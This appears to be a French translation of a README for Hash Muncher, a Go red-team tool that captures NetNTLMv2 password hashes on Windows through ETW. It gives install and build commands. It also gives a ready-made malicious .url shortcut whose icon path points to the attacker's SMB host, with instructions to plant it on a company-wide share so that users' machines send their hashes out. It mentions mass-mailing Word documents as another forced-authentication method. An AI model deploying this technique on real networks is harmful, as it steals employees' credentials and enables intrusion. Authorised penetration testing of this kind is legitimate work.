
Récupérez les hashs NetNTLMv2 via ETW avec des droits administratifs sur Windows 8.1 / Windows Server 2016 et versions ultérieures.
Récupérez des hashes NetNTLMv2 en utilisant ETW avec des droits administrateur sur Windows
Trois options différentes pour le faire fonctionner
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Assurez-vous que le pare-feu Windows autorise le « Partage de fichiers et d'imprimantes » car Hash Muncher nécessite que le service SMB intégré envoie et reçoive la requête initiale et les paquets de réponse vers la cible.
Dans une invite élevée, exécutez Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Remplacez l'adresse IP par celle de votre machine Hash Muncher, et enregistrez le fichier sur un partage de fichiers (à l'échelle de l'entreprise) sous le nom 'whatever.url', puis regardez les hashes arriver en masse.
Il existe d'autres méthodes mentionnées dans Red Team Notes - Forced Authentication, et vous pouvez probablement aussi réussir en envoyant à tout le monde un document Word, mais ce n'est pas du tout furtif.
J'ai joué avec ETW de temps en temps, mais dès que j'ai vu la très cool recherche de Nettitude Labs j'ai su que je devais en faire un outil facile à utiliser dans mon langage préféré, Golang ! Nettitude Labs a un POC fonctionnel écrit en C# tournant sous le framework .Net, et cela pourrait être une meilleure option pour vous. Donc je n'invente vraiment rien ici, j'ajoute simplement cela comme une alternative.
Si vous aimez les trucs de sécurité Windows, vous aimerez peut-être aussi mon outil de graphe d'attaque Adalanche